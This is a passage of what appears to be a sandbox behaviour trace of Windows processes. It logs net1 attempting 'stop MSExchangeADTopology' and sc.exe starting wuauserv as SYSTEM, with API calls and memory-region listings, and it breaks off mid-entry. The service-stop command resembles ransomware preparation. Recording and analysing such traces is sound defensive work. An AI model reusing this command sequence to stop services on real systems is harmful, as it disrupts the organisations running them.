_String2="MSExchangeADTopology") returned -6 [0142.841] _wcsicmp (_String1="groups", _String2="MSExchangeADTopology") returned -6 [0142.841] _wcsicmp (_String1="help", _String2="MSExchangeADTopology") returned -5 [0142.841] _wcsicmp (_String1="helpmsg", _String2="MSExchangeADTopology") returned -5 [0142.841] _wcsicmp (_String1="localgroup", _String2="MSExchangeADTopology") returned -1 [0142.841] _wcsicmp (_String1="pause", _String2="MSExchangeADTopology") returned 3 [0142.841] _wcsicmp (_String1="session", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="sessions", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="sess", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="share", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="start", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="stats", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="statistics", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="stop", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="time", _String2="MSExchangeADTopology") returned 7 [0142.841] _wcsicmp (_String1="user", _String2="MSExchangeADTopology") returned 8 [0142.841] _wcsicmp (_String1="users", _String2="MSExchangeADTopology") returned 8 [0142.841] _wcsicmp (_String1="msg", _String2="MSExchangeADTopology") returned 2 [0142.841] _wcsicmp (_String1="messenger", _String2="MSExchangeADTopology") returned -14 [0142.841] _wcsicmp (_String1="receiver", _String2="MSExchangeADTopology") returned 5 [0142.841] _wcsicmp (_String1="rcv", _String2="MSExchangeADTopology") returned 5 [0142.841] _wcsicmp (_String1="netpopup", _String2="MSExchangeADTopology") returned 1 [0142.841] _wcsicmp (_String1="redirector", _String2="MSExchangeADTopology") returned 5 [0142.841] _wcsicmp (_String1="redir", _String2="MSExchangeADTopology") returned 5 [0142.841] _wcsicmp (_String1="rdr", _String2="MSExchangeADTopology") returned 5 [0142.841] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeADTopology") returned 10 [0142.841] _wcsicmp (_String1="work", _String2="MSExchangeADTopology") returned 10 [0142.841] _wcsicmp (_String1="wksta", _String2="MSExchangeADTopology") returned 10 [0142.841] _wcsicmp (_String1="prdr", _String2="MSExchangeADTopology") returned 3 [0142.841] _wcsicmp (_String1="devrdr", _String2="MSExchangeADTopology") returned -9 [0142.841] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeADTopology") returned -1 [0142.841] _wcsicmp (_String1="server", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="svr", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="srv", _String2="MSExchangeADTopology") returned 6 [0142.841] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeADTopology") returned -1 [0142.841] _wcsicmp (_String1="alerter", _String2="MSExchangeADTopology") returned -12 [0142.841] _wcsicmp (_String1="netlogon", _String2="MSExchangeADTopology") returned 1 [0142.841] _wcsupr (in: _String="MSExchangeADTopology" | out: _String="MSEXCHANGEADTOPOLOGY") returned="MSEXCHANGEADTOPOLOGY" [0142.841] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xdc2610 [0142.843] GetServiceKeyNameW (in: hSCManager=0xdc2610, lpDisplayName="MSEXCHANGEADTOPOLOGY", lpServiceName=0x10a8cb0, lpcchBuffer=0xbff5cc | out: lpServiceName="", lpcchBuffer=0xbff5cc) returned 0 [0142.844] _wcsicmp (_String1="msg", _String2="MSEXCHANGEADTOPOLOGY") returned 2 [0142.844] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEADTOPOLOGY") returned -14 [0142.844] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEADTOPOLOGY") returned 5 [0142.844] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEADTOPOLOGY") returned 5 [0142.844] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEADTOPOLOGY") returned 5 [0142.844] _wcsicmp (_String1="redir", _String2="MSEXCHANGEADTOPOLOGY") returned 5 [0142.844] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEADTOPOLOGY") returned 5 [0142.844] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEADTOPOLOGY") returned 10 [0142.844] _wcsicmp (_String1="work", _String2="MSEXCHANGEADTOPOLOGY") returned 10 [0142.844] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEADTOPOLOGY") returned 10 [0142.844] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEADTOPOLOGY") returned 3 [0142.844] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEADTOPOLOGY") returned -9 [0142.844] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEADTOPOLOGY") returned -1 [0142.844] _wcsicmp (_String1="server", _String2="MSEXCHANGEADTOPOLOGY") returned 6 [0142.844] _wcsicmp (_String1="svr", _String2="MSEXCHANGEADTOPOLOGY") returned 6 [0142.844] _wcsicmp (_String1="srv", _String2="MSEXCHANGEADTOPOLOGY") returned 6 [0142.844] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEADTOPOLOGY") returned -1 [0142.844] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEADTOPOLOGY") returned -12 [0142.844] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEADTOPOLOGY") returned 1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="WORKSTATION") returned -10 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="LanmanWorkstation") returned 1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="SERVER") returned -6 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="LanmanServer") returned 1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="BROWSER") returned 11 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="BROWSER") returned 11 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="MESSENGER") returned 14 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="MESSENGER") returned 14 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETRUN") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETRUN") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="SPOOLER") returned -6 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="SPOOLER") returned -6 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="ALERTER") returned 12 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="ALERTER") returned 12 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETLOGON") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETLOGON") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETPOPUP") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="NETPOPUP") returned -1 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="SQLSERVER") returned -6 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="SQLSERVER") returned -6 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="REPLICATOR") returned -5 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="REPLICATOR") returned -5 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="REMOTEBOOT") returned -5 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="REMOTEBOOT") returned -5 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="TIMESOURCE") returned -7 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="TIMESOURCE") returned -7 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="AFP") returned 12 [0142.844] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="AFP") returned 12 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="UPS") returned -8 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="UPS") returned -8 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="XACTSRV") returned -11 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="XACTSRV") returned -11 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="TCPIP") returned -7 [0142.845] _wcsicmp (_String1="MSEXCHANGEADTOPOLOGY", _String2="TCPIP") returned -7 [0142.845] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xdc3408 [0142.845] OpenServiceW (hSCManager=0xdc3408, lpServiceName="MSEXCHANGEADTOPOLOGY", dwDesiredAccess=0x84) returned 0x0 [0142.845] GetLastError () returned 0x424 [0142.845] CloseServiceHandle (hSCObject=0xdc3408) returned 1 [0142.845] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0142.845] LoadLibraryW (lpLibFileName="NETMSG") returned 0xc70000 [0142.846] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xc70000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0142.847] GetFileType (hFile=0x40) returned 0x2 [0142.847] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xbff468 | out: lpMode=0xbff468) returned 1 [0142.847] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbff474, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xbff474*=0x1e) returned 1 [0142.847] GetFileType (hFile=0x40) returned 0x2 [0142.847] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xbff468 | out: lpMode=0xbff468) returned 1 [0142.848] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbff474, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xbff474*=0x2) returned 1 [0142.848] _ultow (in: _Dest=0x889, _Radix=12579976 | out: _Dest=0x889) returned="2185" [0142.848] FormatMessageW (in: dwFlags=0x2800, lpSource=0xc70000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0142.848] GetFileType (hFile=0x40) returned 0x2 [0142.848] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xbff458 | out: lpMode=0xbff458) returned 1 [0142.848] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xbff464, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xbff464*=0x34) returned 1 [0142.848] GetFileType (hFile=0x40) returned 0x2 [0142.848] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xbff458 | out: lpMode=0xbff458) returned 1 [0142.848] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbff464, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xbff464*=0x2) returned 1 [0142.849] NetApiBufferFree (Buffer=0xdc8000) returned 0x0 [0142.849] NetApiBufferFree (Buffer=0xdc8090) returned 0x0 [0142.849] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeADTopology\"" [0142.849] exit (_Code=2) Thread: id = 794 os_tid = 0x718 Process: id = "277" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf00c000" os_pid = "0xb08" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x378" cmd_line = "C:\\Windows\\system32\\sc.exe start wuauserv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0e3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 13814 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13815 start_va = 0xcbc7590000 end_va = 0xcbc75affff entry_point = 0x0 region_type = private name = "private_0x000000cbc7590000" filename = "" Region: id = 13816 start_va = 0xcbc75b0000 end_va = 0xcbc75c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbc75b0000" filename = "" Region: id = 13817 start_va = 0xcbc75d0000 end_va = 0xcbc764ffff entry_point = 0x0 region_type = private name = "private_0x000000cbc75d0000" filename = "" Region: id = 13818 start_va = 0xcbc7650000 end_va = 0xcbc7653fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbc7650000" filename = "" Region: id = 13819 start_va = 0xcbc7660000 end_va = 0xcbc7660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbc7660000" filename = "" Region: id = 13820 start_va = 0xcbc7670000 end_va = 0xcbc7671fff entry_point = 0x0 region_type = private name = "private_0x000000cbc7670000" filename = "" Region: id = 13821 start_va = 0x7df5ff330000 end_va = 0x7ff5ff32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff330000" filename = "" Region: id = 13822 start_va = 0x7ff7f8110000 end_va = 0x7ff7f8132fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7f8110000" filename = "" Region: id = 13823 start_va = 0x7ff7f813d000 end_va = 0x7ff7f813efff entry_point = 0x0 region_type = private name = "private_0x00007ff7f813d000" filename = "" Region: id = 13824 start_va = 0x7ff7f813f000 end_va = 0x7ff7f813ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7f813f000" filename = "" Region: id = 13825 start_va = 0x7ff7f8280000 end_va = 0x7ff7f8295fff entry_point = 0x7ff7f8280000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 13826 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13827 start_va = 0xcbc77d0000 end_va = 0xcbc78cffff entry_point = 0x0 region_type = private name = "private_0x000000cbc77d0000" filename = "" Region: id = 13828 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13829 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13866 start_va = 0xcbc7590000 end_va = 0xcbc759ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbc7590000" filename = "" Region: id = 13867 start_va = 0xcbc75a0000 end_va = 0xcbc75a6fff entry_point = 0x0 region_type = private name = "private_0x000000cbc75a0000" filename = "" Region: id = 13868 start_va = 0xcbc7680000 end_va = 0xcbc773dfff entry_point = 0xcbc7680000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13869 start_va = 0xcbc7740000 end_va = 0xcbc77bffff entry_point = 0x0 region_type = private name = "private_0x000000cbc7740000" filename = "" Region: id = 13870 start_va = 0xcbc79b0000 end_va = 0xcbc79bffff entry_point = 0x0 region_type = private name = "private_0x000000cbc79b0000" filename = "" Region: id = 13871 start_va = 0x7ff7f8010000 end_va = 0x7ff7f810ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7f8010000" filename = "" Region: id = 13872 start_va = 0x7ff7f813b000 end_va = 0x7ff7f813cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7f813b000" filename = "" Region: id = 13873 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13874 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13875 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13876 start_va = 0xcbc77c0000 end_va = 0xcbc77c6fff entry_point = 0x0 region_type = private name = "private_0x000000cbc77c0000" filename = "" Region: id = 13933 start_va = 0xcbc78d0000 end_va = 0xcbc78e1fff entry_point = 0xcbc78d0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 1064 os_tid = 0xdc8 [0159.379] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7f8280000 [0159.379] __set_app_type (_Type=0x1) [0159.379] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7f8281f00) returned 0x0 [0159.380] __wgetmainargs (in: _Argc=0x7ff7f8291028, _Argv=0x7ff7f8291030, _Env=0x7ff7f8291038, _DoWildCard=0, _StartInfo=0x7ff7f8291044 | out: _Argc=0x7ff7f8291028, _Argv=0x7ff7f8291030, _Env=0x7ff7f8291038) returned 0 [0159.380] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.381] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0159.381] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0159.381] _wcsicmp (_String1="start", _String2="query") returned 2 [0159.381] _wcsicmp (_String1="start", _String2="queryex") returned 2 [0159.381] _wcsicmp (_String1="start", _String2="start") returned 0 [0159.381] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0159.382] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xcbc77d8610 [0159.386] OpenServiceW (hSCManager=0xcbc77d8610, lpServiceName="wuauserv", dwDesiredAccess=0x14) returned 0xcbc77d8670 [0159.386] StartServiceW (hService=0xcbc77d8670, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0159.393] ResolveDelayLoadedAPI () returned 0x7ffc02113f00 [0159.393] QueryServiceStatusEx (in: hService=0xcbc77d8670, InfoLevel=0x0, lpBuffer=0xcbc764f888, cbBufSize=0x24, pcbBytesNeeded=0xcbc764f864 | out: lpBuffer=0xcbc764f888, pcbBytesNeeded=0xcbc764f864) returned 1 [0159.393] _ultow (in: _Dest=0x20, _Radix=-949684488 | out: _Dest=0x20) returned="20" [0159.393] _ultow (in: _Dest=0x2, _Radix=-949684368 | out: _Dest=0x2) returned="2" [0159.394] _ultow (in: _Dest=0x0, _Radix=-949684440 | out: _Dest=0x0) returned="0" [0159.394] _ultow (in: _Dest=0x0, _Radix=-949684560 | out: _Dest=0x0) returned="0" [0159.394] _ultow (in: _Dest=0x0, _Radix=-949684392 | out: _Dest=0x0) returned="0" [0159.394] _ultow (in: _Dest=0x0, _Radix=-949684536 | out: _Dest=0x0) returned="0" [0159.394] _ultow (in: _Dest=0x0, _Radix=-949684512 | out: _Dest=0x0) returned="0" [0159.394] _ultow (in: _Dest=0x7d0, _Radix=-949684464 | out: _Dest=0x7d0) returned="7d0" [0159.394] _ultow (in: _Dest=0x378, _Radix=-949684416 | out: _Dest=0x378) returned="888" [0159.394] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x31, dwLanguageId=0x0, lpBuffer=0xcbc764f608, nSize=0x2, Arguments=0xcbc764f620 | out: lpBuffer="힀읽Ë") returned 0x1a9 [0160.629] GetFileType (hFile=0x24) returned 0x2 [0160.629] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xcbc764f610 | out: lpMode=0xcbc764f610) returned 1 [0160.635] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xcbc77dd780*, nNumberOfCharsToWrite=0x1a9, lpNumberOfCharsWritten=0xcbc764f600, lpReserved=0x0 | out: lpBuffer=0xcbc77dd780*, lpNumberOfCharsWritten=0xcbc764f600*=0x1a9) returned 1 [0160.637] LocalFree (hMem=0xcbc77dd780) returned 0x0 [0160.637] LocalFree (hMem=0x0) returned 0x0 [0160.637] CloseServiceHandle (hSCObject=0xcbc77d8670) returned 1 [0160.637] CloseServiceHandle (hSCObject=0xcbc77d8610) returned 1 [0160.637] LocalFree (hMem=0x0) returned 0x0 [0160.637] exit (_Code=0) Thread: id = 1386 os_tid = 0x908 Process: id = "278" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2b566000" os_pid = "0x224" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "277" os_parent_pid = "0xb08" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0e3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 13830 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13831 start_va = 0x9bbcfe0000 end_va = 0x9bbcffffff entry_point = 0x0 region_type = private name = "private_0x0000009bbcfe0000" filename = "" Region: id = 13832 start_va = 0x9bbd000000 end_va = 0x9bbd013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009bbd000000" filename = "" Region: id = 13833 start_va = 0x9bbd020000 end_va = 0x9bbd05ffff entry_point = 0x0 region_type = private name = "private_0x0000009bbd020000" filename = "" Region: id = 13834 start_va = 0x7df5ff140000 end_va = 0x7ff5ff13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff140000" filename = "" Region: id = 13835 start_va = 0x7ff6c4440000 end_va = 0x7ff6c4462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4440000" filename = "" Region: id = 13836 start_va = 0x7ff6c446d000 end_va = 0x7ff6c446efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c446d000" filename = "" Region: id = 13837 start_va = 0x7ff6c446f000 end_va = 0x7ff6c446ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c446f000" filename = "" Region: id = 13838 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 13839 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13840 start_va = 0x9bbd0a0000 end_va = 0x9bbd19ffff entry_point = 0x0 region_type = private name = "private_0x0000009bbd0a0000" filename = "" Region: id = 13841 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13842 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13843 start_va = 0x9bbcfe0000 end_va = 0x9bbcfeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009bbcfe0000" filename = "" Region: id = 13844 start_va = 0x9bbcff0000 end_va = 0x9bbcff6fff entry_point = 0x0 region_type = private name = "private_0x0000009bbcff0000" filename = "" Region: id = 13845 start_va = 0x9bbd060000 end_va = 0x9bbd09ffff entry_point = 0x0 region_type = private name = "private_0x0000009bbd060000" filename = "" Region: id = 13846 start_va = 0x9bbd1a0000 end_va = 0x9bbd25dfff entry_point = 0x9bbd1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13847 start_va = 0x9bbd260000 end_va = 0x9bbd260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009bbd260000" filename = "" Region: id = 13848 start_va = 0x9bbd270000 end_va = 0x9bbd276fff entry_point = 0x0 region_type = private name = "private_0x0000009bbd270000" filename = "" Region: id = 13849 start_va = 0x9bbd280000 end_va = 0x9bbd280fff entry_point = 0x0 region_type = private name = "private_0x0000009bbd280000" filename = "" Region: id = 13850 start_va = 0x9bbd290000 end_va = 0x9bbd290fff entry_point = 0x0 region_type = private name = "private_0x0000009bbd290000" filename = "" Region: id = 13851 start_va = 0x9bbd2b0000 end_va = 0x9bbd2bffff entry_point = 0x0 region_type = private name = "private_0x0000009bbd2b0000" filename = "" Region: id = 13852 start_va = 0x9bbd2c0000 end_va = 0x9bbd447fff entry_point = 0x0 